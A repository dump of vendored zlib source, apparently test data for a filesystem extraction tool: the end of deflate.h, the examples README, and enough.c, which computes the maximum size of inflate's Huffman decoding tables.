    const static_tree_desc *stat_desc;  /* the corresponding static tree */
} FAR tree_desc;

typedef ush Pos;
typedef Pos FAR Posf;
typedef unsigned IPos;

/* A Pos is an index in the character window. We use short instead of int to
 * save space in the various tables. IPos is used only for parameter passing.
 */

typedef struct internal_state {
    z_streamp strm;      /* pointer back to this zlib stream */
    int   status;        /* as the name implies */
    Bytef *pending_buf;  /* output still pending */
    ulg   pending_buf_size; /* size of pending_buf */
    Bytef *pending_out;  /* next pending byte to output to the stream */
    ulg   pending;       /* nb of bytes in the pending buffer */
    int   wrap;          /* bit 0 true for zlib, bit 1 true for gzip */
    gz_headerp  gzhead;  /* gzip header information to write */
    ulg   gzindex;       /* where in extra, name, or comment */
    Byte  method;        /* can only be DEFLATED */
    int   last_flush;    /* value of flush param for previous deflate call */

                /* used by deflate.c: */

    uInt  w_size;        /* LZ77 window size (32K by default) */
    uInt  w_bits;        /* log2(w_size)  (8..16) */
    uInt  w_mask;        /* w_size - 1 */

    Bytef *window;
    /* Sliding window. Input bytes are read into the second half of the window,
     * and move to the first half later to keep a dictionary of at least wSize
     * bytes. With this organization, matches are limited to a distance of
     * wSize-MAX_MATCH bytes, but this ensures that IO is always
     * performed with a length multiple of the block size. Also, it limits
     * the window size to 64K, which is quite useful on MSDOS.
     * To do: use the user input buffer as sliding window.
     */

    ulg window_size;
    /* Actual size of window: 2*wSize, except when the user input buffer
     * is directly used as sliding window.
     */

    Posf *prev;
    /* Link to older string with same hash index. To limit the size of this
     * array to 64K, this link is maintained only for the last 32K strings.
     * An index in this array is thus a window index modulo 32K.
     */

    Posf *head; /* Heads of the hash chains or NIL. */

    uInt  ins_h;          /* hash index of string to be inserted */
    uInt  hash_size;      /* number of elements in hash table */
    uInt  hash_bits;      /* log2(hash_size) */
    uInt  hash_mask;      /* hash_size-1 */

    uInt  hash_shift;
    /* Number of bits by which ins_h must be shifted at each input
     * step. It must be such that after MIN_MATCH steps, the oldest
     * byte no longer takes part in the hash key, that is:
     *   hash_shift * MIN_MATCH >= hash_bits
     */

    long block_start;
    /* Window position at the beginning of the current output block. Gets
     * negative when the window is moved backwards.
     */

    uInt match_length;           /* length of best match */
    IPos prev_match;             /* previous match */
    int match_available;         /* set if previous match exists */
    uInt strstart;               /* start of string to insert */
    uInt match_start;            /* start of matching string */
    uInt lookahead;              /* number of valid bytes ahead in window */

    uInt prev_length;
    /* Length of the best match at previous step. Matches not greater than this
     * are discarded. This is used in the lazy match evaluation.
     */

    uInt max_chain_length;
    /* To speed up deflation, hash chains are never searched beyond this
     * length.  A higher limit improves compression ratio but degrades the
     * speed.
     */

    uInt max_lazy_match;
    /* Attempt to find a better match only when the current match is strictly
     * smaller than this value. This mechanism is used only for compression
     * levels >= 4.
     */
#   define max_insert_length  max_lazy_match
    /* Insert new strings in the hash table only if the match length is not
     * greater than this length. This saves time but degrades compression.
     * max_insert_length is used only for compression levels <= 3.
     */

    int level;    /* compression level (1..9) */
    int strategy; /* favor or force Huffman coding*/

    uInt good_match;
    /* Use a faster search when the previous match is longer than this */

    int nice_match; /* Stop searching when current match exceeds this */

                /* used by trees.c: */
    /* Didn't use ct_data typedef below to suppress compiler warning */
    struct ct_data_s dyn_ltree[HEAP_SIZE];   /* literal and length tree */
    struct ct_data_s dyn_dtree[2*D_CODES+1]; /* distance tree */
    struct ct_data_s bl_tree[2*BL_CODES+1];  /* Huffman tree for bit lengths */

    struct tree_desc_s l_desc;               /* desc. for literal tree */
    struct tree_desc_s d_desc;               /* desc. for distance tree */
    struct tree_desc_s bl_desc;              /* desc. for bit length tree */

    ush bl_count[MAX_BITS+1];
    /* number of codes at each bit length for an optimal tree */

    int heap[2*L_CODES+1];      /* heap used to build the Huffman trees */
    int heap_len;               /* number of elements in the heap */
    int heap_max;               /* element of largest frequency */
    /* The sons of heap[n] are heap[2*n] and heap[2*n+1]. heap[0] is not used.
     * The same heap array is used to build all trees.
     */

    uch depth[2*L_CODES+1];
    /* Depth of each subtree used as tie breaker for trees of equal frequency
     */

    uchf *sym_buf;        /* buffer for distances and literals/lengths */

    uInt  lit_bufsize;
    /* Size of match buffer for literals/lengths.  There are 4 reasons for
     * limiting lit_bufsize to 64K:
     *   - frequencies can be kept in 16 bit counters
     *   - if compression is not successful for the first block, all input
     *     data is still in the window so we can still emit a stored block even
     *     when input comes from standard input.  (This can also be done for
     *     all blocks if lit_bufsize is not greater than 32K.)
     *   - if compression is not successful for a file smaller than 64K, we can
     *     even emit a stored file instead of a stored block (saving 5 bytes).
     *     This is applicable only for zip (not gzip or zlib).
     *   - creating new Huffman trees less frequently may not provide fast
     *     adaptation to changes in the input data statistics. (Take for
     *     example a binary file with poorly compressible code followed by
     *     a highly compressible string table.) Smaller buffer sizes give
     *     fast adaptation but have of course the overhead of transmitting
     *     trees more frequently.
     *   - I can't count above 4
     */

    uInt sym_next;      /* running index in sym_buf */
    uInt sym_end;       /* symbol table full when sym_next reaches this */

    ulg opt_len;        /* bit length of current block with optimal trees */
    ulg static_len;     /* bit length of current block with static trees */
    uInt matches;       /* number of string matches in current block */
    uInt insert;        /* bytes at end of window left to insert */

#ifdef ZLIB_DEBUG
    ulg compressed_len; /* total bit length of compressed file mod 2^32 */
    ulg bits_sent;      /* bit length of compressed data sent mod 2^32 */
#endif

    ush bi_buf;
    /* Output buffer. bits are inserted starting at the bottom (least
     * significant bits).
     */
    int bi_valid;
    /* Number of valid bits in bi_buf.  All bits above the last valid bit
     * are always zero.
     */

    ulg high_water;
    /* High water mark offset in window for initialized bytes -- bytes above
     * this are set to zero in order to avoid memory check warnings when
     * longest match routines access bytes past the input.  This is then
     * updated to the new high water mark.
     */

} FAR deflate_state;

/* Output a byte on the stream.
 * IN assertion: there is enough room in pending_buf.
 * The macro performs no bounds check of its own: every caller must have
 * established that pending < pending_buf_size before using it.
 */
#define put_byte(s, c) {s->pending_buf[s->pending++] = (Bytef)(c);}


#define MIN_LOOKAHEAD (MAX_MATCH+MIN_MATCH+1)
/* Minimum amount of lookahead, except at the end of the input file.
 * See deflate.c for comments about the MIN_MATCH+1.
 */

#define MAX_DIST(s)  ((s)->w_size-MIN_LOOKAHEAD)
/* In order to simplify the code, particularly on 16 bit machines, match
 * distances are limited to MAX_DIST instead of WSIZE.
 */

#define WIN_INIT MAX_MATCH
/* Number of bytes after end of data in window to initialize in order to avoid
   memory checker errors from longest match routines */

        /* in trees.c */
void ZLIB_INTERNAL _tr_init(deflate_state *s);
int ZLIB_INTERNAL _tr_tally(deflate_state *s, unsigned dist, unsigned lc);
void ZLIB_INTERNAL _tr_flush_block(deflate_state *s, charf *buf,
                                   ulg stored_len, int last);
void ZLIB_INTERNAL _tr_flush_bits(deflate_state *s);
void ZLIB_INTERNAL _tr_align(deflate_state *s);
void ZLIB_INTERNAL _tr_stored_block(deflate_state *s, charf *buf,
                                    ulg stored_len, int last);

#define d_code(dist) \
   ((dist) < 256 ? _dist_code[dist] : _dist_code[256+((dist)>>7)])
/* Mapping from a distance to a distance code. dist is the distance - 1 and
 * must not have side effects. _dist_code[256] and _dist_code[257] are never
 * used.
 */

#ifndef ZLIB_DEBUG
/* Inline versions of _tr_tally for speed: */

#if defined(GEN_TREES_H) || !defined(STDC)
  extern uch ZLIB_INTERNAL _length_code[];
  extern uch ZLIB_INTERNAL _dist_code[];
#else
  extern const uch ZLIB_INTERNAL _length_code[];
  extern const uch ZLIB_INTERNAL _dist_code[];
#endif

/* Each tally appends exactly three bytes to sym_buf and then sets `flush`
 * when sym_next has reached sym_end. The macros do not bounds-check sym_buf
 * themselves: they rely on the caller flushing the block as soon as `flush`
 * is set, which the deflate_* routines in deflate.c do.
 * NOTE(review): the test is an equality, so it assumes sym_end is reachable
 * in steps of three from wherever sym_next is reset -- confirm where sym_end
 * and sym_buf are set up (not visible in this header).
 * In _tr_tally_dist the distance is narrowed to ush and the length to uch
 * before they are stored.
 */
# define _tr_tally_lit(s, c, flush) \
  { uch cc = (c); \
    s->sym_buf[s->sym_next++] = 0; \
    s->sym_buf[s->sym_next++] = 0; \
    s->sym_buf[s->sym_next++] = cc; \
    s->dyn_ltree[cc].Freq++; \
    flush = (s->sym_next == s->sym_end); \
   }
# define _tr_tally_dist(s, distance, length, flush) \
  { uch len = (uch)(length); \
    ush dist = (ush)(distance); \
    s->sym_buf[s->sym_next++] = (uch)dist; \
    s->sym_buf[s->sym_next++] = (uch)(dist >> 8); \
    s->sym_buf[s->sym_next++] = len; \
    dist--; \
    s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
    s->dyn_dtree[d_code(dist)].Freq++; \
    flush = (s->sym_next == s->sym_end); \
  }
#else
/* Debug builds route both tallies through the _tr_tally() function. */
# define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
# define _tr_tally_dist(s, distance, length, flush) \
              flush = _tr_tally(s, distance, length)
#endif

#endif /* DEFLATE_H */

================================================
FILE: 
internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/README.examples ================================================ This directory contains examples of the use of zlib and other relevant programs and documentation. enough.c calculation and justification of ENOUGH parameter in inftrees.h - calculates the maximum table space used in inflate tree construction over all possible Huffman codes fitblk.c compress just enough input to nearly fill a requested output size - zlib isn't designed to do this, but fitblk does it anyway gun.c uncompress a gzip file - illustrates the use of inflateBack() for high speed file-to-file decompression using call-back functions - is approximately twice as fast as gzip -d - also provides Unix uncompress functionality, again twice as fast gzappend.c append to a gzip file - illustrates the use of the Z_BLOCK flush parameter for inflate() - illustrates the use of deflatePrime() to start at any bit gzjoin.c join gzip files without recalculating the crc or recompressing - illustrates the use of the Z_BLOCK flush parameter for inflate() - illustrates the use of crc32_combine() gzlog.c gzlog.h efficiently and robustly maintain a message log file in gzip format - illustrates use of raw deflate, Z_PARTIAL_FLUSH, deflatePrime(), and deflateSetDictionary() - illustrates use of a gzip header extra field gznorm.c normalize a gzip file by combining members into a single member - demonstrates how to concatenate deflate streams using Z_BLOCK zlib_how.html painfully comprehensive description of zpipe.c (see below) - describes in excruciating detail the use of deflate() and inflate() zpipe.c reads and writes zlib streams from stdin to stdout - illustrates the proper use of deflate() and inflate() - deeply commented in zlib_how.html (see above) zran.c zran.h index a zlib or gzip stream and randomly access it - illustrates the use of Z_BLOCK, inflatePrime(), and inflateSetDictionary() to provide random access 
================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/enough.c ================================================ /* enough.c -- determine the maximum size of inflate's Huffman code tables over * all possible valid and complete prefix codes, subject to a length limit. * Copyright (C) 2007, 2008, 2012, 2018 Mark Adler * Version 1.5 5 August 2018 Mark Adler */ /* Version history: 1.0 3 Jan 2007 First version (derived from codecount.c version 1.4) 1.1 4 Jan 2007 Use faster incremental table usage computation Prune examine() search on previously visited states 1.2 5 Jan 2007 Comments clean up As inflate does, decrease root for short codes Refuse cases where inflate would increase root 1.3 17 Feb 2008 Add argument for initial root table size Fix bug for initial root table size == max - 1 Use a macro to compute the history index 1.4 18 Aug 2012 Avoid shifts more than bits in type (caused endless loop!) Clean up comparisons of different types Clean up code indentation 1.5 5 Aug 2018 Clean up code style, formatting, and comments Show all the codes for the maximum, and only the maximum */ /* Examine all possible prefix codes for a given number of symbols and a maximum code length in bits to determine the maximum table size for zlib's inflate. Only complete prefix codes are counted. Two codes are considered distinct if the vectors of the number of codes per length are not identical. So permutations of the symbol assignments result in the same code for the counting, as do permutations of the assignments of the bit values to the codes (i.e. only canonical codes are counted). We build a code from shorter to longer lengths, determining how many symbols are coded at each length. At each step, we have how many symbols remain to be coded, what the last code length used was, and how many bit patterns of that length remain unused. 
Then we add one to the code length and double the number of unused patterns to graduate to the next code length. We then assign all portions of the remaining symbols to that code length that preserve the properties of a correct and eventually complete code. Those properties are: we cannot use more bit patterns than are available; and when all the symbols are used, there are exactly zero possible bit patterns left unused. The inflate Huffman decoding algorithm uses two-level lookup tables for speed. There is a single first-level table to decode codes up to root bits in length (root == 9 for literal/length codes and root == 6 for distance codes, in the current inflate implementation). The base table has 1 << root entries and is indexed by the next root bits of input. Codes shorter than root bits have replicated table entries, so that the correct entry is pointed to regardless of the bits that follow the short code. If the code is longer than root bits, then the table entry points to a second-level table. The size of that table is determined by the longest code with that root-bit prefix. If that longest code has length len, then the table has size 1 << (len - root), to index the remaining bits in that set of codes. Each subsequent root-bit prefix then has its own sub-table. The total number of table entries required by the code is calculated incrementally as the number of codes at each bit length is populated. When all of the codes are shorter than root bits, then root is reduced to the longest code length, resulting in a single, smaller, one-level table. The inflate algorithm also provides for small values of root (relative to the log2 of the number of symbols), where the shortest code has more bits than root. In that case, root is increased to the length of the shortest code. This program, by design, does not handle that case, so it is verified that the number of symbols is less than 1 << (root + 1). 
In order to speed up the examination (by about ten orders of magnitude for the default arguments), the intermediate states in the build-up of a code are remembered and previously visited branches are pruned. The memory required for this will increase rapidly with the total number of symbols and the maximum code length in bits. However this is a very small price to pay for the vast speedup. First, all of the possible prefix codes are counted, and reachable intermediate states are noted by a non-zero count in a saved-results array. Second, the intermediate states that lead to (root + 1) bit or longer codes are used to look at all sub-codes from those junctures for their inflate memory usage. (The amount of memory used is not affected by the number of codes of root bits or less in length.) Third, the visited states in the construction of those sub-codes and the associated calculation of the table size is recalled in order to avoid recalculating from the same juncture. Beginning the code examination at (root + 1) bit codes, which is enabled by identifying the reachable nodes, accounts for about six of the orders of magnitude of improvement for the default arguments. About another four orders of magnitude come from not revisiting previous states. Out of approximately 2x10^16 possible prefix codes, only about 2x10^6 sub-codes need to be examined to cover all of the possible table memory usage cases for the default arguments of 286 symbols limited to 15-bit codes. Note that the uintmax_t type is used for counting. It is quite easy to exceed the capacity of an eight-byte integer with a large number of symbols and a large maximum code length, so multiple-precision arithmetic would need to replace the integer arithmetic in that case. This program will abort if an overflow occurs. The big_t type identifies where the counting takes place. The uintmax_t type is also used for calculating the number of possible codes remaining at the maximum length. 
This limits the maximum code length to the number of bits in a long long minus the number of bits needed to represent the symbols in a flat code. The code_t type identifies where the bit-pattern counting takes place. */ #include #include #include #include #include #include #define local static // Special data types. typedef uintmax_t big_t; // type for code counting #define PRIbig "ju" // printf format for big_t typedef uintmax_t code_t; // type for bit pattern counting struct tab { // type for been-here check size_t len; // allocated length of bit vector in octets char *vec; // allocated bit vector }; /* The array for saving results, num[], is indexed with this triplet: syms: number of symbols remaining to code left: number of available bit patterns at length len len: number of bits in the codes currently being assigned Those indices are constrained thusly when saving results: syms: 3..totsym (totsym == total symbols to code) left: 2..syms - 1, but only the evens (so syms == 8 -> 2, 4, 6) len: 1..max - 1 (max == maximum code length in bits) syms == 2 is not saved since that immediately leads to a single code. left must be even, since it represents the number of available bit patterns at the current length, which is double the number at the previous length. left ends at syms-1 since left == syms immediately results in a single code. (left > sym is not allowed since that would result in an incomplete code.) len is less than max, since the code completes immediately when len == max. The offset into the array is calculated for the three indices with the first one (syms) being outermost, and the last one (len) being innermost. We build the array with length max-1 lists for the len index, with syms-3 of those for each symbol. There are totsym-2 of those, with each one varying in length as a function of sym. See the calculation of index in map() for the index, and the calculation of size in main() for the size of the array. 
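For the deflate example of 286 symbols limited to 15-bit codes, the array
   has 284,284 entries, taking up 2.17 MB for an 8-byte big_t. More than
   half of the space allocated for saved results is actually used -- not all
   possible triplets are reached in the generation of valid prefix codes.
 */

/* The array for tracking visited states, done[], is itself indexed identically
   to the num[] array as described above for the (syms, left, len) triplet.
   Each element in the array is further indexed by the (mem, rem) doublet,
   where mem is the amount of inflate table space used so far, and rem is the
   remaining unused entries in the current inflate sub-table. Each indexed
   element is simply one bit indicating whether the state has been visited or
   not. Since the ranges for mem and rem are not known a priori, each bit
   vector is of a variable size, and grows as needed to accommodate the visited
   states. mem and rem are used to calculate a single index in a triangular
   array. Since the range of mem is expected in the default case to be about
   ten times larger than the range of rem, the array is skewed to reduce the
   memory usage, with eight times the range for mem than for rem. See the
   calculations for offset and bit in been_here() for the details.

   For the deflate example of 286 symbols limited to 15-bit codes, the bit
   vectors grow to total 5.5 MB, in addition to the 4.3 MB done array itself.
 */

// Type for a variable-length, allocated string.
typedef struct {
    char *str;          // pointer to allocated string
    size_t size;        // size of allocation
    size_t len;         // length of string, not including terminating zero
} string_t;

// Clear a string_t. Only the terminator and the length are reset; the
// allocation and its recorded size are kept. s->str must already point at an
// allocation of at least one byte.
local void string_clear(string_t *s) {
    s->str[0] = 0;
    s->len = 0;
}

// Initialize a string_t with a 16-byte allocation holding the empty string.
// Allocation failure is caught by assert() only, so a build with NDEBUG
// defined would go on to write through a null pointer in string_clear().
local void string_init(string_t *s) {
    s->size = 16;
    s->str = malloc(s->size);
    assert(s->str != NULL && "out of memory");
    string_clear(s);
}

// Release the allocation of a string_t. The fields are reset so that a second
// call is harmless; the string must be initialized again before further use.
local void string_free(string_t *s) {
    free(s->str);
    s->str = NULL;
    s->size = 0;
    s->len = 0;
}

// Save the results of printf with fmt and the subsequent argument list to s.
// Each call appends to s. The allocated space for s is increased as needed.
//
// The text is first formatted into whatever room is left. vsnprintf() returns
// the length the complete text needs, so when it did not fit, the allocation
// is doubled until it does and the text is formatted a second time. A va_list
// is indeterminate once it has been passed to vsnprintf(), so the argument
// list is ended and started again for the second pass instead of being reused
// (reusing it made the second pass read the wrong arguments on common ABIs).
//
// A formatting error, size overflow and a failed realloc() are checked with
// assert() only, and are therefore unchecked in a build with NDEBUG defined.
local void string_printf(string_t *s, char *fmt, ...) {
    va_list ap;
    size_t len = s->len;

    // first pass: format into the space that is already there
    va_start(ap, fmt);
    int ret = vsnprintf(s->str + len, s->size - len, fmt, ap);
    va_end(ap);
    assert(ret >= 0 && "out of memory");
    s->len += ret;

    // the text plus its terminating zero must fit -- if not, grow and redo
    if (s->size < s->len + 1) {
        do {
            s->size <<= 1;
            assert(s->size != 0 && "overflow");
        } while (s->size < s->len + 1);
        s->str = realloc(s->str, s->size);
        assert(s->str != NULL && "out of memory");

        // second pass with a fresh argument list
        va_start(ap, fmt);
        vsnprintf(s->str + len, s->size - len, fmt, ap);
        va_end(ap);
    }
}

// Globals to avoid propagating constants or constant pointers recursively.
struct {
    int max;            // maximum allowed bit length for the codes
    int root;           // size of base code table in bits
    int large;          // largest code table so far
    size_t size;        // number of elements in num and done
    big_t tot;          // total number of codes with maximum tables size
    string_t out;       // display of subcodes for maximum tables size
    int *code;          // number of symbols assigned to each bit length
    big_t *num;         // saved results array for code counting
    struct tab *done;   // states already evaluated array
} g;

// Index function for num[] and done[]. syms selects the outermost group, left
// the list within it, and len the element within that list of g.max - 1
// entries. Nothing here checks the triplet against the allocated size: callers
// must stay within the ranges given in the comment on the num[] array.
local inline size_t map(int syms, int left, int len) {
    return ((size_t)((syms - 1) >> 1) * ((syms - 2) >> 1) +
            (left >> 1) - 1) * (g.max - 1) +
           len - 1;
}

// Free allocated space in globals. Every pointer is set back to NULL, so
// calling this again, or calling it before anything was allocated, is safe.
local void cleanup(void) {
    if (g.done != NULL) {
        // only states that were visited have a bit vector to release
        for (size_t n = 0; n < g.size; n++)
            if (g.done[n].len)
                free(g.done[n].vec);
        g.size = 0;
        free(g.done);
        g.done = NULL;
    }
    free(g.num);
    g.num = NULL;
    free(g.code);
    g.code = NULL;
    string_free(&g.out);
}

// Return the number of possible prefix codes using bit patterns of lengths len
// through max inclusive, coding syms symbols, with left bit patterns of length
// len unused -- return -1 if there is an overflow in the counting.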
// Keep a record of previous results in num to prevent repeating the same
// calculation.
//
// A zero entry in g.num means "not computed yet", which works because every
// stored total is asserted to be non-zero. The overflow marker (big_t)-1 is
// passed straight up through the recursion and is never stored. The state
// check below is an assert(), so a build with NDEBUG defined indexes g.num
// without verifying that (syms, left, len) is a saved state.
local big_t count(int syms, int left, int len) {
    // every unused pattern takes exactly one symbol -- a single code
    if (syms == left)
        return 1;

    // note and verify the expected state
    assert(syms > left && left > 0 && len < g.max);

    // reuse the saved total if this state was already counted
    size_t slot = map(syms, left, len);
    big_t cached = g.num[slot];
    if (cached != 0)
        return cached;

    // fewest bit patterns to use here so that the code won't be incomplete at
    // the next length (more bit patterns than symbols)
    int lo = (left << 1) - syms;
    lo = lo < 0 ? 0 : lo;

    // most bit patterns to use here, lest there not be enough available for
    // the remaining symbols at the maximum length (if there were no limit to
    // the code length, this would become: hi = left - 1)
    int span = g.max - len;
    int hi = (((code_t)left << span) - syms) / (((code_t)1 << span) - 1);

    // add up the codes reachable through each permitted choice
    big_t total = 0;
    int use = lo;
    while (use <= hi) {
        big_t sub = count(syms - use, (left - use) << 1, len + 1);
        total += sub;
        if (sub == (big_t)-1 || total < sub)    // overflow
            return (big_t)-1;
        use++;
    }

    // verify that all recursive calls are productive
    assert(total != 0);

    // remember the total for this state and hand it back
    g.num[slot] = total;
    return total;
}

// Return true if we've been here before, set to true if not. Set a bit in a
// bit vector to indicate visiting this state. Each (syms,len,left) state has a
// variable size bit vector indexed by (mem,rem). The bit vector is lengthened
// as needed to allow setting the (mem,rem) bit.
local int been_here(int syms, int left, int len, int mem, int rem) {
    // the bit vector that belongs to (syms,left,len)
    struct tab *slot = &g.done[map(syms, left, len)];

    // reduce (mem,rem) to a byte offset and a bit within that byte
    mem -= 1 << g.root;         // mem always includes the root table
    mem >>= 1;                  // mem and rem are always even
    rem >>= 1;
    size_t offset = (mem >> 3) + rem;
    offset = ((offset * (offset + 1)) >> 1) + rem;
    int bit = 1 << (mem & 7);

    // a set bit inside the current vector means this state was visited
    size_t have = slot->len;
    if (offset < have && (slot->vec[offset] & bit) != 0)
        return 1;

    // first visit -- make sure the vector reaches offset before marking it
    if (have <= offset) {
        // double from the current length, or from 16 for a new vector, until
        // offset is covered
        size_t want = have ? have : 16;
        while (want <= offset)
            want <<= 1;

        char *vector;
        if (have) {
            // enlarge the existing vector and zero out the appended space
            vector = realloc(slot->vec, want);
            assert(vector != NULL && "out of memory");
            memset(vector + have, 0, want - have);
        }
        else {
            // no vector yet -- make a new one, already zeroed
            vector = calloc(want, 1);
            assert(vector != NULL && "out of memory");
        }

        // install the new vector
        slot->len = want;
        slot->vec = vector;
    }

    // record the visit
    slot->vec[offset] |= bit;
    return 0;
}

// Examine all possible codes from the given node (syms, len, left). Compute
// the amount of memory required to build inflate's decoding tables, where the
// number of code structures used so far is mem, and the number remaining in
// the current sub-table is rem.
// Each call handles one code length: it records in g.code[len] how many
// symbols get that length, recurses with len + 1, and clears g.code[len] again
// on the way back, so g.code always describes the path currently being
// explored. When a code completes with a table size of at least g.large, its
// description is appended to g.out (after emptying g.out for a new maximum).
local void examine(int syms, int left, int len, int mem, int rem) {
    // see if we have a complete code
    if (syms == left) {
        // set the last code entry
        g.code[len] = left;

        // complete computation of memory used by this code
        while (rem < left) {
            left -= rem;
            rem = 1 << (len - g.root);
            mem += rem;
        }
        assert(rem == left);

        // if this is at the maximum, show the sub-code
        if (mem >= g.large) {
            // if this is a new maximum, update the maximum and clear out the
            // printed sub-codes from the previous maximum
            if (mem > g.large) {
                g.large = mem;
                string_clear(&g.out);
            }

            // compute the starting state for this sub-code by walking g.code
            // back from the longest length down to root + 1
            syms = 0;
            left = 1 << g.max;
            for (int bits = g.max; bits > g.root; bits--) {
                syms += g.code[bits];
                left -= g.code[bits];
                assert((left & 1) == 0);
                left >>= 1;
            }

            // print the starting state and the resulting sub-code to g.out
            // NOTE(review): the %u conversions are given int arguments here
            string_printf(&g.out, "<%u, %u, %u>:",
                          syms, g.root + 1, ((1 << g.root) - left) << 1);
            for (int bits = g.root + 1; bits <= g.max; bits++)
                if (g.code[bits])
                    string_printf(&g.out, " %d[%d]", g.code[bits], bits);
            string_printf(&g.out, "\n");
        }

        // remove entries as we drop back down in the recursion
        g.code[len] = 0;
        return;
    }

    // prune the tree if we can -- been_here() also marks this state as visited
    if (been_here(syms, left, len, mem, rem))
        return;

    // we need to use at least this many bit patterns so that the code won't be
    // incomplete at the next length (more bit patterns than symbols)
    int least = (left << 1) - syms;
    if (least < 0)
        least = 0;

    // we can use at most this many bit patterns, lest there not be enough
    // available for the remaining symbols at the maximum length (if there were
    // no limit to the code length, this would become: most = left - 1)
    int most = (((code_t)left << (g.max - len)) - syms) /
               (((code_t)1 << (g.max - len)) - 1);

    // occupy least table spaces, creating new sub-tables as needed
    int use = least;
    while (rem < use) {
        use -= rem;
        rem = 1 << (len - g.root);
        mem += rem;
    }
    rem -= use;

    // examine codes from here, updating table space as we go -- mem and rem
    // carry over from one iteration to the next, so the order of the
    // statements in this loop matters
    for (use = least; use <= most; use++) {
        g.code[len] = use;
        examine(syms - use, (left - use) << 1, len + 1,
                mem + (rem ? 1 << (len - g.root) : 0), rem << 1);
        if (rem == 0) {
            rem = 1 << (len - g.root);
            mem += rem;
        }
        rem--;
    }

    // remove entries as we drop back down in the recursion
    g.code[len] = 0;
}

// Look at all sub-codes starting with root + 1 bits. Look at only the valid
// intermediate code states (syms, left, len). For each completed code,
// calculate the amount of memory required by inflate to build the decoding
// tables. Find the maximum amount of memory required and show the codes that
// require that maximum.
//
// This reads the counts that count() left in g.num to decide which states are
// reachable, so it is only meaningful after the counting pass has filled
// g.num. The result is printed to stdout.
local void enough(int syms) {
    // clear code
    for (int n = 0; n <= g.max; n++)
        g.code[n] = 0;

    // look at all (root + 1) bit and longer codes
    string_clear(&g.out);           // empty saved results
    g.large = 1 << g.root;          // base table
    if (g.root < g.max)             // otherwise, there's only a base table
        for (int n = 3; n <= syms; n++)
            for (int left = 2; left < n; left += 2) {
                // look at all reachable (root + 1) bit nodes, and the
                // resulting codes (complete at root + 2 or more)
                size_t index = map(n, left, g.root + 1);
                // g.num[index] is read only when root + 1 is below max, the
                // largest length that has a saved entry
                if (g.root + 1 < g.max && g.num[index]) // reachable node
                    examine(n, left, g.root + 1, 1 << g.root, 0);

                // also look at root bit codes with completions at root + 1
                // bits (not saved in num, since complete), just in case
                // (len is the innermost index of map(), so index - 1 is the
                // entry for the same n and left at length root)
                if (g.num[index - 1] && n <= left << 1)
                    examine((n - left) << 1, (n - left) << 1, g.root + 1,
                            1 << g.root, 0);
            }

    // done
    printf("maximum of %d table entries for root = %d\n", g.large, g.root);
    fputs(g.out.str, stdout);
}

// Examine and show the total number of possible prefix codes for a given
// maximum number of symbols, initial root table size, and maximum code length
// in bits -- those are the command arguments in that order. The default values
// are 286, 9, and 15 respectively, for the deflate literal/length code. The
// possible codes are counted for each number of coded symbols from two to the
// maximum.
// The counts for each of those and the total number of codes are shown. The
// maximum number of inflate table entries is then calculated across all
// possible codes. Each new maximum number of table entries and the associated
// sub-code (starting at root + 1 == 10 bits) is shown.
//
// To count and examine prefix codes that are not length-limited, provide a
// maximum length equal to the number of symbols minus one.
//
// For the deflate literal/length code, use "enough". For the deflate distance
// code, use "enough 30 6".
//
// Returns 1 when the arguments are rejected and 0 otherwise. Allocation
// failures and counting overflow are detected with assert() only, so those
// checks disappear in a build with NDEBUG defined. The early "return 1" paths
// leave without calling cleanup().
int main(int argc, char **argv) {
    // set up globals for cleanup()
    g.code = NULL;
    g.num = NULL;
    g.done = NULL;
    string_init(&g.out);

    // get arguments -- default to the deflate literal/length code
    // atoi() reports no errors: an argument that does not start with a number
    // gives 0, which the range test below rejects, and trailing characters
    // after a number are ignored
    int syms = 286;
    g.root = 9;
    g.max = 15;
    if (argc > 1) {
        syms = atoi(argv[1]);
        if (argc > 2) {
            g.root = atoi(argv[2]);
            if (argc > 3)
                g.max = atoi(argv[3]);
        }
    }
    if (argc > 4 || syms < 2 || g.root < 1 || g.max < 1) {
        fputs("invalid arguments, need: [sym >= 2 [root >= 1 [max >= 1]]]\n",
              stderr);
        return 1;
    }

    // if not restricting the code length, the longest is syms - 1
    if (g.max > syms - 1)
        g.max = syms - 1;

    // determine the number of bits in a code_t
    int bits = 0;
    for (code_t word = 1; word; word <<= 1)
        bits++;

    // make sure that the calculation of most will not overflow
    if (g.max > bits || (code_t)(syms - 2) >= ((code_t)-1 >> (g.max - 1))) {
        fputs("abort: code length too long for internal types\n", stderr);
        return 1;
    }

    // reject impossible code requests
    if ((code_t)(syms - 1) > ((code_t)1 << g.max) - 1) {
        fprintf(stderr, "%d symbols cannot be coded in %d bits\n",
                syms, g.max);
        return 1;
    }

    // allocate code vector -- one entry per bit length, 0..max
    g.code = calloc(g.max + 1, sizeof(int));
    assert(g.code != NULL && "out of memory");

    // determine size of saved results array, checking for overflows,
    // allocate and clear the array (set all to zero with calloc())
    if (syms == 2)              // iff max == 1
        g.num = NULL;           // won't be saving any results
    else {
        // size = (syms / 2) * ((syms - 1) / 2) * (max - 1), with each
        // multiplication checked against the largest size_t first
        g.size = syms >> 1;
        int n = (syms - 1) >> 1;
        assert(g.size <= (size_t)-1 / n && "overflow");
        g.size *= n;
        n = g.max - 1;
        assert(g.size <= (size_t)-1 / n && "overflow");
        g.size *= n;
        g.num = calloc(g.size, sizeof(big_t));
        assert(g.num != NULL && "out of memory");
    }

    // count possible codes for all numbers of symbols, add up counts
    big_t sum = 0;
    for (int n = 2; n <= syms; n++) {
        big_t got = count(n, 2, 1);
        sum += got;
        assert(got != (big_t)-1 && sum >= got && "overflow");
    }
    printf("%"PRIbig" total codes for 2 to %d symbols", sum, syms);
    if (g.max < syms - 1)
        printf(" (%d-bit length limit)\n", g.max);
    else
        puts(" (no length limit)");

    // allocate and clear done array for been_here()
    if (syms == 2)
        g.done = NULL;
    else {
        g.done = calloc(g.size, sizeof(struct tab));
        assert(g.done != NULL && "out of memory");
    }

    // find and show maximum inflate table usage
    if (g.root > g.max)         // reduce root to max length
        g.root = g.max;
    if ((code_t)syms < ((code_t)1 << (g.root + 1)))
        enough(syms);
    else
        // this message has no trailing newline, and the exit status stays 0
        fputs("cannot handle minimum code lengths > root", stderr);

    // done
    cleanup();
    return 0;
}

================================================
